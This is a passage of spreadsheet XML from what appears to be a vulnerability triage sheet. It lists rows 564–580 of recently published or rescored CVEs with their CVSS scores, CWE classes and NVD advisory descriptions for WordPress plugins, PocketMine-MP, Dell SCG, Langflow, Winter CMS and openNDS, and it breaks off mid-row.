      <c r="J564" s="5" t="inlineStr"/>
      <c r="K564" s="5" t="inlineStr"/>
      <c r="L564" s="5" t="inlineStr"/>
      <c r="M564" s="5" t="inlineStr"/>
      <c r="N564" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O564" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P564" s="5" t="inlineStr"/>
      <c r="Q564" s="5" t="inlineStr">
        <is>
          <t>CWE-269</t>
        </is>
      </c>
      <c r="R564" s="5" t="inlineStr">
        <is>
          <t>The PublishPress Capabilities – User Role Editor, Access Permissions, User Capabilities, Admin Menus plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 2.50.0. This is due to the `addPluginCapabilities()` function unconditionally granting the Editor role all 15 `manage_capabilities_*` capabilities — including `manage_capabilities`, `manage_capabilities_roles`, `manage_capabilities_settings`, and `manage_capabilities_backup` — via a hard-coded `$eligible_roles = ['administrator', 'editor']` assignment that runs automatically on the first `admin_init` after plugin activation with no administrator opt-in, persisting the grants directly to the database. This makes it possible for authenticated attackers with Editor-level access to elevate their privileges to a site-wide capability manager, enabling them to create, rename, and delete non-system roles, modify capabilities of non-administrator roles, restore role backups, and write arbitrary plugin options whose names begin with `cme_`, `capsman`, `pp_capabilities`, or `presspermit` via `update_option()`. The escalation stops short of full Administrator access, as WordPress's `map_meta_cap` layer still prevents the escalated Editor from granting administrator-only capabilities to other roles; however, all role-management and plugin-settings functionality gated solely on `manage_capabilities_*` capabilities remains fully accessible.</t>
        </is>
      </c>
      <c r="S564" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75927</t>
        </is>
      </c>
    </row>
    <row r="565">
      <c r="A565" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B565" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C565" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79426</t>
        </is>
      </c>
      <c r="D565" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E565" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F565" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G565" s="5" t="inlineStr"/>
      <c r="H565" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I565" s="5" t="inlineStr"/>
      <c r="J565" s="5" t="inlineStr"/>
      <c r="K565" s="5" t="inlineStr"/>
      <c r="L565" s="5" t="inlineStr"/>
      <c r="M565" s="5" t="inlineStr"/>
      <c r="N565" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O565" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P565" s="5" t="inlineStr"/>
      <c r="Q565" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="R565" s="5" t="inlineStr">
        <is>
          <t>An arbitrary file deletion vulnerability in the /adminapi/file/video_data_save component of CRMEB v6.0.0 allows authenticated attackers to delete arbitrary files via crafted POST request.</t>
        </is>
      </c>
      <c r="S565" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79426</t>
        </is>
      </c>
    </row>
    <row r="566">
      <c r="A566" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B566" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C566" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79972</t>
        </is>
      </c>
      <c r="D566" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E566" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F566" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G566" s="5" t="inlineStr"/>
      <c r="H566" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I566" s="5" t="inlineStr"/>
      <c r="J566" s="5" t="inlineStr"/>
      <c r="K566" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L566" s="5" t="inlineStr"/>
      <c r="M566" s="5" t="inlineStr"/>
      <c r="N566" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O566" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P566" s="5" t="inlineStr"/>
      <c r="Q566" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R566" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains an Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S566" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79972</t>
        </is>
      </c>
    </row>
    <row r="567">
      <c r="A567" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B567" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C567" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83593</t>
        </is>
      </c>
      <c r="D567" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E567" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F567" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G567" s="5" t="inlineStr"/>
      <c r="H567" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I567" s="5" t="inlineStr"/>
      <c r="J567" s="5" t="inlineStr"/>
      <c r="K567" s="5" t="inlineStr"/>
      <c r="L567" s="5" t="inlineStr"/>
      <c r="M567" s="5" t="inlineStr"/>
      <c r="N567" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O567" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P567" s="5" t="inlineStr"/>
      <c r="Q567" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R567" s="5" t="inlineStr">
        <is>
          <t>The WPBot – AI ChatBot for Live Support, Lead Generation, AI Services plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'conversation' parameter in all versions up to, and including, 8.7.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The action is gated only by a nonce that is localized into every public-facing page via wp_localize_script, rendering the nonce check ineffective as an access control barrier for unauthenticated users.</t>
        </is>
      </c>
      <c r="S567" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83593</t>
        </is>
      </c>
    </row>
    <row r="568">
      <c r="A568" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B568" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C568" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84293</t>
        </is>
      </c>
      <c r="D568" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E568" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F568" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G568" s="5" t="inlineStr"/>
      <c r="H568" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I568" s="5" t="inlineStr"/>
      <c r="J568" s="5" t="inlineStr"/>
      <c r="K568" s="5" t="inlineStr"/>
      <c r="L568" s="5" t="inlineStr"/>
      <c r="M568" s="5" t="inlineStr"/>
      <c r="N568" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O568" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P568" s="5" t="inlineStr"/>
      <c r="Q568" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R568" s="5" t="inlineStr">
        <is>
          <t>The Repeater Fields for Gravity Forms plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Repeated Multi-Input Sub-Field Values in all versions up to, and including, 3.0.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This vulnerability only affects multi-input sub-field types within a repeater (such as Name, Address, and Checkbox fields), as scalar single-input field values are escaped with esc_html() at the output stage in version 3.0.4.</t>
        </is>
      </c>
      <c r="S568" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84293</t>
        </is>
      </c>
    </row>
    <row r="569">
      <c r="A569" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B569" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C569" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86544</t>
        </is>
      </c>
      <c r="D569" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E569" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F569" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G569" s="5" t="inlineStr"/>
      <c r="H569" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I569" s="5" t="inlineStr"/>
      <c r="J569" s="5" t="inlineStr"/>
      <c r="K569" s="5" t="inlineStr"/>
      <c r="L569" s="5" t="inlineStr"/>
      <c r="M569" s="5" t="inlineStr"/>
      <c r="N569" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O569" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P569" s="5" t="inlineStr"/>
      <c r="Q569" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R569" s="5" t="inlineStr">
        <is>
          <t>knowns versions before 0.30.0 contain an authorization bypass vulnerability where mutating code actions are incorrectly classified as read-only operations. Attackers with read-restricted sessions can exploit code.replace to modify permission configurations and escalate privileges on subsequent calls.</t>
        </is>
      </c>
      <c r="S569" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86544</t>
        </is>
      </c>
    </row>
    <row r="570">
      <c r="A570" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B570" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C570" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87021</t>
        </is>
      </c>
      <c r="D570" s="5" t="n">
        <v>7.2</v>
      </c>
      <c r="E570" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F570" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G570" s="5" t="inlineStr"/>
      <c r="H570" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I570" s="5" t="inlineStr"/>
      <c r="J570" s="5" t="inlineStr"/>
      <c r="K570" s="5" t="inlineStr">
        <is>
          <t>tanium:comply</t>
        </is>
      </c>
      <c r="L570" s="5" t="inlineStr"/>
      <c r="M570" s="5" t="inlineStr"/>
      <c r="N570" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O570" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P570" s="5" t="inlineStr"/>
      <c r="Q570" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R570" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Comply.</t>
        </is>
      </c>
      <c r="S570" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87021</t>
        </is>
      </c>
    </row>
    <row r="571">
      <c r="A571" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B571" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C571" s="5" t="inlineStr">
        <is>
          <t>CVE-2021-48007</t>
        </is>
      </c>
      <c r="D571" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E571" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F571" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G571" s="5" t="inlineStr"/>
      <c r="H571" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I571" s="5" t="inlineStr"/>
      <c r="J571" s="5" t="inlineStr"/>
      <c r="K571" s="5" t="inlineStr"/>
      <c r="L571" s="5" t="inlineStr"/>
      <c r="M571" s="5" t="inlineStr"/>
      <c r="N571" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O571" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P571" s="5" t="inlineStr"/>
      <c r="Q571" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R571" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 3.18.1 fail to validate NaN or INF values in MovePlayerPacket position and rotation fields. Malicious clients can send crafted movement packets with invalid floating-point values to crash servers through unhandled mathematical operations or prevent clients from rendering other players.</t>
        </is>
      </c>
      <c r="S571" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2021-48007</t>
        </is>
      </c>
    </row>
    <row r="572">
      <c r="A572" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B572" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C572" s="5" t="inlineStr">
        <is>
          <t>CVE-2022-51014</t>
        </is>
      </c>
      <c r="D572" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E572" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F572" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G572" s="5" t="inlineStr"/>
      <c r="H572" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I572" s="5" t="inlineStr"/>
      <c r="J572" s="5" t="inlineStr"/>
      <c r="K572" s="5" t="inlineStr"/>
      <c r="L572" s="5" t="inlineStr"/>
      <c r="M572" s="5" t="inlineStr"/>
      <c r="N572" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O572" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="P572" s="5" t="inlineStr"/>
      <c r="Q572" s="5" t="inlineStr">
        <is>
          <t>CWE-248</t>
        </is>
      </c>
      <c r="R572" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 4.0.7 contains an unhandled exception vulnerability in the ModalFormResponsePacket handler when processing malformed JSON from clients. Attackers can send specially crafted form response packets with invalid JSON to trigger an uncaught InvalidArgumentException, causing server crashes.</t>
        </is>
      </c>
      <c r="S572" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2022-51014</t>
        </is>
      </c>
    </row>
    <row r="573">
      <c r="A573" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B573" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C573" s="5" t="inlineStr">
        <is>
          <t>CVE-2023-54396</t>
        </is>
      </c>
      <c r="D573" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E573" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F573" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G573" s="5" t="inlineStr"/>
      <c r="H573" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I573" s="5" t="inlineStr"/>
      <c r="J573" s="5" t="inlineStr"/>
      <c r="K573" s="5" t="inlineStr"/>
      <c r="L573" s="5" t="inlineStr"/>
      <c r="M573" s="5" t="inlineStr"/>
      <c r="N573" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O573" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P573" s="5" t="inlineStr"/>
      <c r="Q573" s="5" t="inlineStr">
        <is>
          <t>CWE-129</t>
        </is>
      </c>
      <c r="R573" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 4.8.1 fail to validate dye color IDs in banner NBT data during deserialization. Attackers can provide invalid color values in inventory transactions or via commands to trigger undefined offset errors and crash the server.</t>
        </is>
      </c>
      <c r="S573" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2023-54396</t>
        </is>
      </c>
    </row>
    <row r="574">
      <c r="A574" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B574" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C574" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-71417</t>
        </is>
      </c>
      <c r="D574" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E574" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F574" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G574" s="5" t="inlineStr"/>
      <c r="H574" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I574" s="5" t="inlineStr"/>
      <c r="J574" s="5" t="inlineStr"/>
      <c r="K574" s="5" t="inlineStr"/>
      <c r="L574" s="5" t="inlineStr"/>
      <c r="M574" s="5" t="inlineStr"/>
      <c r="N574" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O574" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P574" s="5" t="inlineStr"/>
      <c r="Q574" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R574" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP before 5.32.1 fails to validate uniqueness of pack UUIDs in ResourcePackClientResponsePacket STATUS_SEND_PACKS handling, allowing authenticated clients to trigger duplicate pack transmissions. Attackers can send multiple copies of valid pack UUIDs in a single packet to exhaust server memory and cause denial of service.</t>
        </is>
      </c>
      <c r="S574" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-71417</t>
        </is>
      </c>
    </row>
    <row r="575">
      <c r="A575" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-17627</t>
        </is>
      </c>
      <c r="D575" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G575" s="5" t="inlineStr"/>
      <c r="H575" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I575" s="5" t="inlineStr"/>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L575" s="5" t="inlineStr"/>
      <c r="M575" s="5" t="inlineStr"/>
      <c r="N575" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O575" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="P575" s="5" t="inlineStr"/>
      <c r="Q575" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="R575" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.10.2 could allow a remote authenticated attacker to obtain sensitive information and inject messages into workflow history due to improper authorization.</t>
        </is>
      </c>
      <c r="S575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-17627</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21100</t>
        </is>
      </c>
      <c r="D576" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G576" s="5" t="inlineStr"/>
      <c r="H576" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I576" s="5" t="inlineStr"/>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr">
        <is>
          <t>samsung:android</t>
        </is>
      </c>
      <c r="L576" s="5" t="inlineStr"/>
      <c r="M576" s="5" t="inlineStr"/>
      <c r="N576" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O576" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P576" s="5" t="inlineStr"/>
      <c r="Q576" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R576" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SystemUI prior to SMR Sep-2026 Release 1 allows local attackers to launch arbitrary activity.</t>
        </is>
      </c>
      <c r="S576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21100</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-30865</t>
        </is>
      </c>
      <c r="D577" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F577" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G577" s="5" t="inlineStr"/>
      <c r="H577" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I577" s="5" t="inlineStr"/>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr"/>
      <c r="L577" s="5" t="inlineStr"/>
      <c r="M577" s="5" t="inlineStr"/>
      <c r="N577" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O577" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P577" s="5" t="inlineStr"/>
      <c r="Q577" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R577" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, there is a Reflected Cross-Site Scripting (XSS) vulnerability in the dashboard save functionality. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="S577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-30865</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-35445</t>
        </is>
      </c>
      <c r="D578" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F578" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G578" s="5" t="inlineStr"/>
      <c r="H578" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I578" s="5" t="inlineStr"/>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr"/>
      <c r="L578" s="5" t="inlineStr"/>
      <c r="M578" s="5" t="inlineStr"/>
      <c r="N578" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O578" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P578" s="5" t="inlineStr"/>
      <c r="Q578" s="5" t="inlineStr">
        <is>
          <t>CWE-285</t>
        </is>
      </c>
      <c r="R578" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions prior to 1.2.13, the backend did not validate the handler name submitted through the form postback _handler POST field, allowing an authenticated backend user to invoke arbitrary controller methods, including protected, private, and action-prefixed ones. While AJAX requests validate that handler names match the on[A-Z][\w+]* pattern, the postback path passed the submitted _handler value straight to the handler dispatcher with no such check, so any controller that exposes a public action or conditionally relaxes its $requiredPermissions check could be reached, bypassing the roles and permissions system. The built-in Users controller was affected because it set $requiredPermissions to null for the myaccount action, letting any authenticated backend user invoke user-management methods such as update_onDelete and update_onManualPasswordReset without holding the backend.manage_users permission. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-35445</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-38821</t>
        </is>
      </c>
      <c r="D579" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F579" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G579" s="5" t="inlineStr"/>
      <c r="H579" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I579" s="5" t="inlineStr"/>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr"/>
      <c r="L579" s="5" t="inlineStr"/>
      <c r="M579" s="5" t="inlineStr"/>
      <c r="N579" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O579" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P579" s="5" t="inlineStr"/>
      <c r="Q579" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R579" s="5" t="inlineStr">
        <is>
          <t>A heap-based buffer overflow vulnerability exists in openNDS before 11.0.0 that allows an unauthenticated attacker on the captive portal network to crash the openNDS daemon (denial of service) and potentially achieve remote code execution. This is in http_microhttpd.c.</t>
        </is>
      </c>
      <c r="S579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-38821</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-47735</t>
        </is>
      </c>
      <c r="D580" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="E580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F580" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G580" s="5" t="inlineStr"/>
      <c r="H580" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I580" s="5" t="inlineStr"/>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr"/>
      <c r="L580" s="5" t="inlineStr"/>
      <c r="M580" s="5" t="inlineStr"/>
      <c r="N580" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O580" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P580" s="5" t="inlineStr"/>
      <c r="Q580" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-22, CWE-918</t>
        </is>
      </c>
      <c r="R580" s="5" t="inlineStr">
        <is>
